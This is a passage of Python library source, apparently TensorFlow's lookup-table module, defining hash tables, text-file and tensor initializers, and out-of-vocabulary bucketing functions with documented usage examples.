name = context.context().scope_name
else:
name = table_ref.op.name.split("/")[-1]
super(InitializableLookupTableBase,
self).__init__(initializer.key_dtype, initializer.value_dtype,
name)
self._table_ref = table_ref
self._default_value = ops.convert_to_tensor(
default_value, dtype=self._value_dtype)
self._default_value.get_shape().merge_with(tensor_shape.scalar())
self._init = initializer.initialize(self)
@property
def table_ref(self):
"""Get the underlying table reference."""
return self._table_ref
@property
def default_value(self):
"""The default value of the table."""
return self._default_value
@property
def init(self):
"""The table initialization op."""
return self._init
def size(self, name=None):
"""Compute the number of elements in this table.
Args:
name: A name for the operation (optional).
Returns:
A scalar tensor containing the number of elements in this table.
"""
with ops.name_scope(name, "%s_Size" % self._name,
[self._table_ref]) as scope:
return gen_lookup_ops.lookup_table_size_v2(self._table_ref, name=scope)
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values.
The `default_value` is used for keys not present in the table.
Args:
keys: Keys to look up. May be either a `SparseTensor` or dense `Tensor`.
name: A name for the operation (optional).
Returns:
A `SparseTensor` if keys are sparse, otherwise a dense `Tensor`.
Raises:
TypeError: when `keys` or `default_value` doesn't match the table data
types.
"""
key_tensor = keys
if isinstance(keys, sparse_tensor.SparseTensor):
key_tensor = keys.values
if keys.dtype.base_dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
with ops.name_scope(name, "%s_Lookup" % self._name,
(self._table_ref, key_tensor,
self._default_value)) as scope:
values = gen_lookup_ops.lookup_table_find_v2(
self._table_ref, key_tensor, self._default_value, name=scope)
values.set_shape(key_tensor.get_shape())
if isinstance(keys, sparse_tensor.SparseTensor):
return sparse_tensor.SparseTensor(keys.indices, values, keys.dense_shape)
else:
return values
class HashTable(InitializableLookupTableBase):
"""A generic hash table implementation.
Example usage:
```python
table = tf.HashTable(
tf.KeyValueTensorInitializer(keys, values), -1)
out = table.lookup(input_tensor)
table.init.run()
print(out.eval())
```
"""
def __init__(self, initializer, default_value, shared_name=None, name=None):
"""Creates a non-initialized `HashTable` object.
Creates a table, the type of its keys and values are specified by the
initializer.
Before using the table you will have to initialize it. After initialization
the table will be immutable.
Args:
initializer: The table initializer to use. See `HashTable` kernel for
supported key and value types.
default_value: The value to use if a key is missing in the table.
shared_name: If non-empty, this table will be shared under
the given name across multiple sessions.
name: A name for the operation (optional).
Returns:
A `HashTable` object.
"""
with ops.name_scope(name, "hash_table", (initializer,
default_value)) as scope:
table_ref = gen_lookup_ops.hash_table_v2(
shared_name=shared_name,
key_dtype=initializer.key_dtype,
value_dtype=initializer.value_dtype,
name=scope)
super(HashTable, self).__init__(table_ref, default_value, initializer)
class TableInitializerBase(object):
"""Base class for lookup table initializers."""
def __init__(self, key_dtype, value_dtype):
"""Construct a table initializer object.
Args:
key_dtype: Type of the table keys.
value_dtype: Type of the table values.
"""
self._key_dtype = dtypes.as_dtype(key_dtype)
self._value_dtype = dtypes.as_dtype(value_dtype)
@property
def key_dtype(self):
"""The expected table key dtype."""
return self._key_dtype
@property
def value_dtype(self):
"""The expected table value dtype."""
return self._value_dtype
def initialize(self, table):
"""Returns the table initialization op."""
raise NotImplementedError
class KeyValueTensorInitializer(TableInitializerBase):
"""Table initializers given `keys` and `values` tensors."""
def __init__(self, keys, values, key_dtype=None, value_dtype=None, name=None):
"""Constructs a table initializer object based on keys and values tensors.
Args:
keys: The tensor for the keys.
values: The tensor for the values.
key_dtype: The `keys` data type. Used when `keys` is a python array.
value_dtype: The `values` data type. Used when `values` is a python array.
name: A name for the operation (optional).
"""
with ops.name_scope(name, "key_value_init", [keys, values]) as scope:
self._keys = ops.convert_to_tensor(keys, dtype=key_dtype, name="keys")
self._values = ops.convert_to_tensor(
values, dtype=value_dtype, name="values")
self._name = scope
super(KeyValueTensorInitializer, self).__init__(self._keys.dtype,
self._values.dtype)
def initialize(self, table):
"""Initializes the given `table` with `keys` and `values` tensors.
Args:
table: The table to initialize.
Returns:
The operation that initializes the table.
Raises:
TypeError: when the keys and values data types do not match the table
key and value data types.
"""
_check_table_dtypes(table, self._keys.dtype, self._values.dtype)
with ops.name_scope(
self._name, values=(table.table_ref, self._keys,
self._values)) as scope:
init_op = gen_lookup_ops.initialize_table_v2(
table.table_ref, self._keys, self._values, name=scope)
ops.add_to_collection(ops.GraphKeys.TABLE_INITIALIZERS, init_op)
return init_op
class TextFileIndex(object):
WHOLE_LINE = -2
LINE_NUMBER = -1
class TextFileInitializer(TableInitializerBase):
"""Table initializers from a text file.
This initializer assigns one entry in the table for each line in the file.
The key and value type of the table to initialize is given by `key_dtype` and
`value_dtype`.
The key and value content to get from each line is specified by
the `key_index` and `value_index`.
* `TextFileIndex.LINE_NUMBER` means use the line number starting from zero,
expects data type int64.
* `TextFileIndex.WHOLE_LINE` means use the whole line content, expects data
type string.
* A value `>=0` means use the index (starting at zero) of the split line based
on `delimiter`.
For example if we have a file with the following content:
```
emerson 10
lake 20
palmer 30
```
The following snippet initializes a table with the first column as keys and
second column as values:
* `emerson -> 10`
* `lake -> 20`
* `palmer -> 30`
```python
table = tf.contrib.lookup.HashTable(tf.contrib.lookup.TextFileInitializer(
"test.txt", tf.string, 0, tf.int64, 1, delimiter=" "), -1)
...
table.init.run()
```
Similarly to initialize the whole line as keys and the line number as values.
* `emerson 10 -> 0`
* `lake 20 -> 1`
* `palmer 30 -> 2`
```python
table = tf.contrib.lookup.HashTable(tf.contrib.lookup.TextFileInitializer(
"test.txt", tf.string, tf.contrib.lookup.TextFileIndex.WHOLE_LINE,
tf.int64, tf.contrib.lookup.TextFileIndex.LINE_NUMBER, delimiter=" "), -1)
...
table.init.run()
```
"""
def __init__(self,
filename,
key_dtype,
key_index,
value_dtype,
value_index,
vocab_size=None,
delimiter="\t",
name=None):
"""Constructs a table initializer object to populate from a text file.
It generates one key-value pair per line. The type of table key and
value are specified by `key_dtype` and `value_dtype`, respectively.
Similarly the content of the key and value are specified by the key_index
and value_index.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Args:
filename: The filename of the text file to be used for initialization.
The path must be accessible from wherever the graph is initialized
(eg. trainer or eval workers). The filename may be a scalar `Tensor`.
key_dtype: The `key` data type.
key_index: the index that represents information of a line to get the
table 'key' values from.
value_dtype: The `value` data type.
value_index: the index that represents information of a line to get the
table 'value' values from.'
vocab_size: The number of elements in the file, if known.
delimiter: The delimiter to separate fields in a line.
name: A name for the operation (optional).
Raises:
ValueError: when the filename is empty, or when the table key and value
data types do not match the expected data types.
"""
if not isinstance(filename, ops.Tensor) and not filename:
raise ValueError("Filename required for %s." % name)
key_dtype = dtypes.as_dtype(key_dtype)
value_dtype = dtypes.as_dtype(value_dtype)
if key_index < -2:
raise ValueError("Invalid key index %s." % (key_index))
if key_index == TextFileIndex.LINE_NUMBER and key_dtype != dtypes.int64:
raise ValueError("Signature mismatch. Keys must be dtype %s, got %s." %
(dtypes.int64, key_dtype))
if ((key_index == TextFileIndex.WHOLE_LINE) and
(not key_dtype.is_integer) and (key_dtype != dtypes.string)):
raise ValueError(
"Signature mismatch. Keys must be integer or string, got %s." %
key_dtype)
if value_index < -2:
raise ValueError("Invalid value index %s." % (value_index))
if value_index == TextFileIndex.LINE_NUMBER and value_dtype != dtypes.int64:
raise ValueError("Signature mismatch. Values must be dtype %s, got %s." %
(dtypes.int64, value_dtype))
if value_index == TextFileIndex.WHOLE_LINE and value_dtype != dtypes.string:
raise ValueError("Signature mismatch. Values must be dtype %s, got %s." %
(dtypes.string, value_dtype))
if (vocab_size is not None) and (vocab_size <= 0):
raise ValueError("Invalid vocab_size %s." % vocab_size)
self._filename = filename
self._key_index = key_index
self._value_index = value_index
self._vocab_size = vocab_size
self._delimiter = delimiter
self._name = name
super(TextFileInitializer, self).__init__(key_dtype, value_dtype)
def initialize(self, table):
"""Initializes the table from a text file.
Args:
table: The table to be initialized.
Returns:
The operation that initializes the table.
Raises:
TypeError: when the keys and values data types do not match the table
key and value data types.
"""
_check_table_dtypes(table, self.key_dtype, self.value_dtype)
with ops.name_scope(self._name, "text_file_init",
(table.table_ref,)) as scope:
filename = ops.convert_to_tensor(
self._filename, dtypes.string, name="asset_filepath")
init_op = gen_lookup_ops.initialize_table_from_text_file_v2(
table.table_ref,
filename,
self._key_index,
self._value_index,
-1 if self._vocab_size is None else self._vocab_size,
self._delimiter,
name=scope)
ops.add_to_collection(ops.GraphKeys.TABLE_INITIALIZERS, init_op)
# If the filename tensor is anything other than a string constant (e.g., if
# it is a placeholder) then it does not make sense to track it as an asset.
if not context.executing_eagerly() and constant_op.is_constant(filename):
ops.add_to_collection(ops.GraphKeys.ASSET_FILEPATHS, filename)
return init_op
class TextFileStringTableInitializer(TextFileInitializer):
"""Table initializer for `int64` IDs to string tables from a text file."""
def __init__(self,
filename,
key_column_index=TextFileIndex.LINE_NUMBER,
value_column_index=TextFileIndex.WHOLE_LINE,
vocab_size=None,
delimiter="\t",
name="text_file_string_table_init"):
"""Constructs an initializer for an id-to-string table from a text file.
It populates a table that its key and value types are int64 and string,
respectively. It generates one key-value pair per line.
The content of the key and value are specified by `key_column_index`
and `value_column_index`.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Args:
filename: The filename of the text file to be used for initialization.
The path must be accessible from wherever the graph is initialized
(eg. trainer or eval workers). The filename may be a scalar `Tensor`.
key_column_index: The column index from the text file to get the keys
from. The default is to use the line number, starting from zero.
value_column_index: The column index from the text file to get the
values from. The default is to use the whole line content.
vocab_size: The number of elements in the file, if known.
delimiter: The delimiter to separate fields in a line.
name: Optional name for the op.
Raises:
TypeError: when the filename is empty, or when the table key and value
data types do not match the expected data types.
"""
super(TextFileStringTableInitializer, self).__init__(
filename,
dtypes.int64,
key_column_index,
dtypes.string,
value_column_index,
vocab_size=vocab_size,
delimiter=delimiter,
name=name)
class TextFileIdTableInitializer(TextFileInitializer):
"""Table initializer for string to `int64` IDs tables from a text file."""
def __init__(self,
filename,
key_column_index=TextFileIndex.WHOLE_LINE,
value_column_index=TextFileIndex.LINE_NUMBER,
vocab_size=None,
delimiter="\t",
name="text_file_id_table_init",
key_dtype=dtypes.string):
"""Constructs an initializer for an string-to-id table from a text file.
It populates a table that its key and value types are string and int64,
respectively. It generates one key-value pair per line.
The content of the key and value are specified by the key_index
and value_index.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Args:
filename: The filename of the text file to be used for initialization.
The path must be accessible from wherever the graph is initialized
(eg. trainer or eval workers). The filename may be a scalar `Tensor`.
key_column_index: The column index from the text file to get the `key`
values from. The default is to use the whole line content.
value_column_index: The column index from the text file to get the `value`
values from. The default is to use the line number, starting from zero.
vocab_size: The number of elements in the file, if known.
delimiter: The delimiter to separate fields in a line.
name: Optional name for the op.
key_dtype: The `key` data type.
Raises:
TypeError: when the filename is empty, or when the table key and value
data types do not match the expected data types.
"""
super(TextFileIdTableInitializer, self).__init__(
filename,
key_dtype,
key_column_index,
dtypes.int64,
value_column_index,
vocab_size=vocab_size,
delimiter=delimiter,
name=name)
class HasherSpec(collections.namedtuple("HasherSpec", ["hasher", "key"])):
"""A structure for the spec of the hashing function to use for hash buckets.
`hasher` is the name of the hashing function to use (eg. "fasthash",
"stronghash").
`key` is optional and specify the key to use for the hash function if
supported, currently only used by a strong hash.
Fields:
hasher: The hasher name to use.
key: The key to be used by the hashing function, if required.
"""
__slots__ = ()
FastHashSpec = HasherSpec("fasthash", None) # pylint: disable=invalid-name
class StrongHashSpec(HasherSpec):
"""A structure to specify a key of the strong keyed hash spec.
The strong hash requires a `key`, which is a list of 2 unsigned integer
numbers. These should be non-zero; random numbers generated from random.org
would be a fine choice.
Fields:
key: The key to be used by the keyed hashing function.
"""
__slots__ = ()
def __new__(cls, key):
if len(key) != 2:
raise ValueError("key must have size 2, got %s." % len(key))
if not isinstance(key[0], compat.integral_types) or not isinstance(
key[1], compat.integral_types):
raise TypeError("Invalid key %s. Must be unsigned integer values." % key)
return super(cls, StrongHashSpec).__new__(cls, "stronghash", key)
def _as_string(tensor):
if dtypes.string == tensor.dtype.base_dtype:
return tensor
return string_ops.as_string(tensor)
class IdTableWithHashBuckets(LookupInterface):
"""String to Id table wrapper that assigns out-of-vocabulary keys to buckets.
For example, if an instance of `IdTableWithHashBuckets` is initialized with a
string-to-id table that maps:
* `emerson -> 0`
* `lake -> 1`
* `palmer -> 2`
The `IdTableWithHashBuckets` object will performs the following mapping:
* `emerson -> 0`
* `lake -> 1`
* `palmer -> 2`
* `<other term> -> bucket_id`, where bucket_id will be between `3` and
`3 + num_oov_buckets - 1`, calculated by:
`hash(<term>) % num_oov_buckets + vocab_size`
If input_tensor is `["emerson", "lake", "palmer", "king", "crimson"]`,
the lookup result is `[0, 1, 2, 4, 7]`.
If `table` is None, only out-of-vocabulary buckets are used.
Example usage:
```python
num_oov_buckets = 3
input_tensor = tf.constant(["emerson", "lake", "palmer", "king", "crimnson"])
table = tf.IdTableWithHashBuckets(
tf.HashTable(tf.TextFileIdTableInitializer(filename), default_value),
num_oov_buckets)
out = table.lookup(input_tensor).
table.init.run()
print(out.eval())
```
The hash function used for generating out-of-vocabulary buckets ID is handled
by `hasher_spec`.
"""
def __init__(self,
table,
num_oov_buckets,
hasher_spec=FastHashSpec,
name=None,
key_dtype=None):
"""Construct a `IdTableWithHashBuckets` object.
Args:
table: Table that maps `tf.string` or `tf.int64` keys to `tf.int64` ids.
num_oov_buckets: Number of buckets to use for out-of-vocabulary keys.
hasher_spec: A `HasherSpec` to specify the hash function to use for
assignation of out-of-vocabulary buckets (optional).
name: A name for the operation (optional).
key_dtype: Data type of keys passed to `lookup`. Defaults to
`table.key_dtype` if `table` is specified, otherwise `tf.string`.
Must be string or integer, and must be castable to `table.key_dtype`.
Raises:
ValueError: when `table` in None and `num_oov_buckets` is not positive.
TypeError: when `hasher_spec` is invalid.
"""
# If a name ends with a '/' it is a "name scope", remove all trailing '/'
# characters to use as table name.
if name:
name = name.rstrip("/")
if table:
if key_dtype is None:
key_dtype = table.key_dtype
supported_table_key_dtypes = (dtypes.int64, dtypes.string)
if table.key_dtype not in supported_table_key_dtypes:
raise TypeError("Invalid key dtype, expected one of %s, but got %s." %
(supported_table_key_dtypes, key_dtype))
if table.key_dtype.is_integer != key_dtype.is_integer:
raise TypeError("Invalid key dtype, expected %s but got %s." %
("integer" if key_dtype.is_integer else "non-integer",
table.key_dtype))
if table.value_dtype != dtypes.int64:
raise TypeError("Invalid value dtype, expected %s but got %s." %
(dtypes.int64, table.value_dtype))
self._table = table
name = name or self._table.name
else:
if num_oov_buckets <= 0:
raise ValueError("oov_buckets must be > 0 if no table is supplied.")
key_dtype = dtypes.string if key_dtype is None else key_dtype
self._table = None
name = name or "hash_bucket"
if (not key_dtype.is_integer) and (dtypes.string != key_dtype):
raise TypeError(
"Invalid key_dtype, expected integer or string, got %s." % key_dtype)
self._num_oov_buckets = num_oov_buckets
if not isinstance(hasher_spec, HasherSpec):
raise TypeError(
"hasher_spec must be of type HasherSpec, got %s" % hasher_spec)
self._hasher_spec = hasher_spec
super(IdTableWithHashBuckets, self).__init__(key_dtype, dtypes.int64,
name.split("/")[-1])
@property
def init(self):
"""The table initialization op."""
if self._table:
return self._table.init
with ops.name_scope(None, "init"):
return control_flow_ops.no_op()
@property
def table_ref(self):
"""Returns the table_ref of the underlying table, if one exists.
Only use the table_ref directly if you know what you are doing. The
table_ref does not have the "hash bucket" functionality, as that is provided
by this class.
One possible use of the table_ref is subtokenization, i.e. ops which
dynamically decompose tokens into subtokens based on the contents of the
table_ref.
Returns:
the underlying table_ref, or None if there is no underlying table
"""
if self._table is not None:
return self._table.table_ref
return None
def size(self, name=None):
"""Compute the number of elements in this table."""
with ops.name_scope(name, "%s_Size" % self.name) as scope:
if self._table:
tsize = self._table.size(scope)
else:
tsize = ops.convert_to_tensor(0, dtype=dtypes.int64)
return tsize + self._num_oov_buckets
def _get_string_to_hash_bucket_fn(self, hasher_spec):
"""Returns the string_to_hash_bucket op to use based on `hasher_spec`."""
if not isinstance(hasher_spec, HasherSpec):
raise TypeError("hasher_spec must be of type HasherSpec %s" % hasher_spec)
if hasher_spec.hasher == "fasthash":
return string_ops.string_to_hash_bucket_fast
if hasher_spec.hasher == "legacy":
return string_ops.string_to_hash_bucket
if hasher_spec.hasher == "stronghash":
return functools.partial(
string_ops.string_to_hash_bucket_strong, key=hasher_spec.key)
raise ValueError("Unknown hasher %s" % hasher_spec.hasher)
def lookup(self, keys, name=None):
"""Looks up `keys` in the table, outputs the corresponding values.
It assigns out-of-vocabulary keys to buckets based in their hashes.
Args:
keys: Keys to look up. May be either a `SparseTensor` or dense `Tensor`.
name: Optional name for the op.
Returns:
A `SparseTensor` if keys are sparse, otherwise a dense `Tensor`.
Raises:
TypeError: when `keys` doesn't match the table key data type.
"""
if keys.dtype.base_dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
values = keys
if isinstance(keys, sparse_tensor.SparseTensor):
values = keys.values
if self._table and (self._table.key_dtype.base_dtype == dtypes.int64):
values = math_ops.to_int64(values)
if self._num_oov_buckets == 0:
ids = self._table.lookup(values, name=name)
else:
# TODO(yleon): Consider moving this functionality to its own kernel.
with ops.name_scope(name, "%s_Lookup" % self.name) as scope:
str_to_hash_bucket = self._get_string_to_hash_bucket_fn(
self._hasher_spec)
buckets = str_to_hash_bucket(
_as_string(values),
num_buckets=self._num_oov_buckets,
name="hash_bucket")
if self._table:
ids = self._table.lookup(values)
buckets = math_ops.add(buckets, self._table.size())
is_id_non_default = math_ops.not_equal(ids, self._table.default_value)
ids = array_ops.where(is_id_non_default, ids, buckets, name=scope)
else:
ids = buckets
if isinstance(keys, sparse_tensor.SparseTensor):
return sparse_tensor.SparseTensor(keys.indices, ids, keys.dense_shape)
return ids
def index_table_from_file(vocabulary_file=None,
num_oov_buckets=0,
vocab_size=None,
default_value=-1,
hasher_spec=FastHashSpec,
key_dtype=dtypes.string,
name=None,
key_column_index=TextFileIndex.WHOLE_LINE,
value_column_index=TextFileIndex.LINE_NUMBER,
delimiter="\t"):
"""Returns a lookup table that converts a string tensor into int64 IDs.
This operation constructs a lookup table to convert tensor of strings into
int64 IDs. The mapping can be initialized from a vocabulary file specified in
`vocabulary_file`, where the whole line is the key and the zero-based line
number is the ID.
Any lookup of an out-of-vocabulary token will return a bucket ID based on its
hash if `num_oov_buckets` is greater than zero. Otherwise it is assigned the
`default_value`.
The bucket ID range is
`[vocabulary size, vocabulary size + num_oov_buckets - 1]`.
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
To specify multi-column vocabulary files, use key_column_index and
value_column_index and delimiter.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Sample Usages:
If we have a vocabulary file "test.txt" with the following content:
```
emerson
lake
palmer
```
```python
features = tf.constant(["emerson", "lake", "and", "palmer"])
table = tf.contrib.lookup.index_table_from_file(
vocabulary_file="test.txt", num_oov_buckets=1)
ids = table.lookup(features)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, 3, 2] # where 3 is the out-of-vocabulary bucket
```
Args:
vocabulary_file: The vocabulary filename, may be a constant scalar `Tensor`.
num_oov_buckets: The number of out-of-vocabulary buckets.
vocab_size: Number of the elements in the vocabulary, if known.
default_value: The value to use for out-of-vocabulary feature values.
Defaults to -1.
hasher_spec: A `HasherSpec` to specify the hash function to use for
assignation of out-of-vocabulary buckets.
key_dtype: The `key` data type.
name: A name for this op (optional).
key_column_index: The column index from the text file to get the `key`
values from. The default is to use the whole line content.
value_column_index: The column index from the text file to get the `value`
values from. The default is to use the line number, starting from zero.
delimiter: The delimiter to separate fields in a line.
Returns:
The lookup table to map a `key_dtype` `Tensor` to index `int64` `Tensor`.
Raises:
ValueError: If `vocabulary_file` is not set.
ValueError: If `num_oov_buckets` is negative or `vocab_size` is not greater
than zero.
"""
if vocabulary_file is None or (
isinstance(vocabulary_file, six.string_types) and not vocabulary_file):
raise ValueError("vocabulary_file must be specified and must not be empty.")
if num_oov_buckets < 0:
raise ValueError("num_oov_buckets must be greater or equal than 0, got %d."
% num_oov_buckets)
if vocab_size is not None and vocab_size < 1:
vocab_file_value = vocabulary_file
if isinstance(vocabulary_file, ops.Tensor):
vocab_file_value = tensor_util.constant_value(vocabulary_file) or "?"
raise ValueError("vocab_size must be greater than 0, got %d. "
"vocabulary_file: %s" % (vocab_size, vocab_file_value))
if (not key_dtype.is_integer) and (dtypes.string != key_dtype.base_dtype):
raise TypeError("Only integer and string keys are supported.")
with ops.name_scope(name, "string_to_index") as feat_to_id_scope:
table = None
shared_name = ""
with ops.name_scope(None, "hash_table") as hash_table_scope:
if vocab_size:
# Keep the shared_name:
# <table_type>_<filename>_<vocab_size>_<key_index>_<value_index>
shared_name = "hash_table_%s_%d_%s_%s" % (vocabulary_file, vocab_size,
key_column_index,
value_column_index)
else:
# Keep the shared_name
# <table_type>_<filename>_<key_index>_<value_index>
shared_name = "hash_table_%s_%s_%s" % (vocabulary_file,
key_column_index,
value_column_index)
init = TextFileIdTableInitializer(
vocabulary_file,
vocab_size=vocab_size,
key_dtype=dtypes.int64 if key_dtype.is_integer else key_dtype,
name="table_init",
key_column_index=key_column_index,
value_column_index=value_column_index,
delimiter=delimiter)
table = HashTable(
init, default_value, shared_name=shared_name, name=hash_table_scope)
if num_oov_buckets:
table = IdTableWithHashBuckets(
table,
num_oov_buckets=num_oov_buckets,
hasher_spec=hasher_spec,
name=feat_to_id_scope,
key_dtype=key_dtype)
return table
def index_table_from_tensor(vocabulary_list,
num_oov_buckets=0,
default_value=-1,
hasher_spec=FastHashSpec,
dtype=dtypes.string,
name=None):
"""Returns a lookup table that converts a string tensor into int64 IDs.
This operation constructs a lookup table to convert tensor of strings into
int64 IDs. The mapping can be initialized from a string `vocabulary_list` 1-D
tensor where each element is a key and corresponding index within the tensor
is the value.
Any lookup of an out-of-vocabulary token will return a bucket ID based on its
hash if `num_oov_buckets` is greater than zero. Otherwise it is assigned the
`default_value`.
The bucket ID range is `[mapping size, mapping size + num_oov_buckets - 1]`.
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
Elements in `mapping` cannot have duplicates, otherwise when executing the
table initializer op, it will throw a `FailedPreconditionError`.
Sample Usages:
```python
vocabulary_list = tf.constant(["emerson", "lake", "palmer"])
table = tf.contrib.lookup.index_table_from_tensor(
mapping=vocabulary_list, num_oov_buckets=1, default_value=-1)
features = tf.constant(["emerson", "lake", "and", "palmer"])
ids = table.lookup(features)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, 4, 2]
```
Args:
vocabulary_list: A 1-D `Tensor` that specifies the mapping of keys to
indices. The type of this object must be castable to `dtype`.
num_oov_buckets: The number of out-of-vocabulary buckets.
default_value: The value to use for out-of-vocabulary feature values.
Defaults to -1.
hasher_spec: A `HasherSpec` to specify the hash function to use for
assignment of out-of-vocabulary buckets.
dtype: The type of values passed to `lookup`. Only string and integers are
supported.
name: A name for this op (optional).
Returns:
The lookup table to map an input `Tensor` to index `int64` `Tensor`.
Raises:
ValueError: If `mapping` is invalid.
ValueError: If `num_oov_buckets` is negative.
"""
if vocabulary_list is None:
raise ValueError("vocabulary_list must be specified.")
if num_oov_buckets < 0:
raise ValueError("num_oov_buckets must be greater or equal than 0, got %d."
% num_oov_buckets)
if (not dtype.is_integer) and (dtypes.string != dtype.base_dtype):
raise TypeError("Only integer and string keys are supported.")
with ops.name_scope(name, "string_to_index") as feat_to_id_scope:
keys = ops.convert_to_tensor(vocabulary_list)
if keys.dtype.is_integer != dtype.is_integer:
raise ValueError("Expected %s, got %s." %
("integer"
if dtype.is_integer else "non-integer", keys.dtype))
if (not dtype.is_integer) and (keys.dtype.base_dtype != dtype):
raise ValueError("Expected %s, got %s." % (dtype, keys.dtype))
num_elements = array_ops.size(keys)
values = math_ops.to_int64(math_ops.range(num_elements))
shared_name = ""
with ops.name_scope(None, "hash_table") as hash_table_scope:
table_keys = math_ops.to_int64(keys) if keys.dtype.is_integer else keys
init = KeyValueTensorInitializer(
table_keys,
values,
table_keys.dtype.base_dtype,
dtypes.int64,
name="table_init")
table = HashTable(
init, default_value, shared_name=shared_name, name=hash_table_scope)
if num_oov_buckets:
table = IdTableWithHashBuckets(
table,
num_oov_buckets=num_oov_buckets,
hasher_spec=hasher_spec,
name=feat_to_id_scope,
key_dtype=dtype)
return table
def index_to_string_table_from_file(vocabulary_file,
vocab_size=None,
default_value="UNK",
name=None,
key_column_index=TextFileIndex.LINE_NUMBER,
value_column_index=TextFileIndex.WHOLE_LINE,
delimiter="\t"):
"""Returns a lookup table that maps a `Tensor` of indices into strings.
This operation constructs a lookup table to map int64 indices into string
values. The table is initialized from a vocabulary file specified in
`vocabulary_file`, where the whole line is the value and the
zero-based line number is the index.
Any input which does not have a corresponding index in the vocabulary file
(an out-of-vocabulary entry) is assigned the `default_value`
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
To specify multi-column vocabulary files, use key_column_index and
value_column_index and delimiter.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Sample Usages:
If we have a vocabulary file "test.txt" with the following content:
```
emerson
lake
palmer
```
```python
indices = tf.constant([1, 5], tf.int64)
table = tf.contrib.lookup.index_to_string_table_from_file(
vocabulary_file="test.txt", default_value="UNKNOWN")
values = table.lookup(indices)
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
vocabulary_file: The vocabulary filename, may be a constant scalar `Tensor`.
vocab_size: Number of the elements in the vocabulary, if known.
default_value: The value to use for out-of-vocabulary indices.
name: A name for this op (optional).
key_column_index: The column index from the text file to get the `key`
values from. The default is to use the line number, starting from zero.
value_column_index: The column index from the text file to get the `value`
values from. The default is to use the whole line content.
delimiter: The delimiter to separate fields in a line.
Returns:
The lookup table to map a string values associated to a given index `int64`
`Tensors`.
Raises:
ValueError: when `vocabulary_file` is empty.
ValueError: when `vocab_size` is invalid.
"""
if vocabulary_file is None or (
isinstance(vocabulary_file, six.string_types) and not vocabulary_file):
raise ValueError("vocabulary_file must be specified and must not be empty.")
if vocab_size is not None and vocab_size < 1:
raise ValueError("vocab_size must be greater than 0, got %d." % vocab_size)
with ops.name_scope(name, "index_to_string") as scope:
shared_name = ""
if vocab_size:
# Keep a shared_name
# <table_type>_<filename>_<vocab_size>_<key_index>_<value_index>
shared_name = "hash_table_%s_%d_%s_%s" % (vocabulary_file, vocab_size,
key_column_index,
value_column_index)
else:
# Keep a shared_name <table_type>_<filename>_<key_index>_<value_index>
shared_name = "hash_table_%s_%s_%s" % (vocabulary_file, key_column_index,
value_column_index)
init = TextFileStringTableInitializer(
vocabulary_file,
vocab_size=vocab_size,
name="table_init",
key_column_index=key_column_index,
value_column_index=value_column_index,
delimiter=delimiter)
# TODO(yleon): Use a more effienct structure.
return HashTable(init, default_value, shared_name=shared_name, name=scope)
def index_to_string_table_from_tensor(vocabulary_list,
default_value="UNK",
name=None):
"""Returns a lookup table that maps a `Tensor` of indices into strings.
This operation constructs a lookup table to map int64 indices into string
values. The mapping is initialized from a string `mapping` 1-D `Tensor` where
each element is a value and the corresponding index within the tensor is the
key.
Any input which does not have a corresponding index in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
Elements in `mapping` cannot have duplicates, otherwise when executing the
table initializer op, it will throw a `FailedPreconditionError`.
Sample Usages:
```python
vocabulary_list = tf.constant(["emerson", "lake", "palmer"])
indices = tf.constant([1, 5], tf.int64)
table = tf.contrib.lookup.index_to_string_table_from_tensor(
vocabulary_list, default_value="UNKNOWN")
values = table.lookup(indices)
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
vocabulary_list: A 1-D string `Tensor` that specifies the strings to map
from indices.
default_value: The value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The lookup table to map a string values associated to a given index `int64`
`Tensors`.
Raises:
ValueError: when `vocabulary_list` is not set.
"""
if vocabulary_list is None:
raise ValueError("vocabulary_list must be specified.")
with ops.name_scope(name, "index_to_string") as scope:
vocabulary_list = ops.convert_to_tensor(vocabulary_list, dtypes.string)
num_elements = array_ops.size(vocabulary_list)
keys = math_ops.to_int64(math_ops.range(num_elements))
shared_name = ""
init = KeyValueTensorInitializer(
keys, vocabulary_list, dtypes.int64, dtypes.string, name="table_init")
# TODO(yleon): Use a more effienct structure.
return HashTable(init, default_value, shared_name=shared_name, name=scope)
ops.NotDifferentiable("LookupTableFind")
ops.NotDifferentiable("LookupTableFindV2")
ops.NotDifferentiable("LookupTableInsert")
ops.NotDifferentiable("LookupTableInsertV2")
ops.NotDifferentiable("LookupTableSize")
ops.NotDifferentiable("LookupTableSizeV2")
ops.NotDifferentiable("HashTable")
ops.NotDifferentiable("HashTableV2")
ops.NotDifferentiable("InitializeTable")
ops.NotDifferentiable("InitializeTableV2")
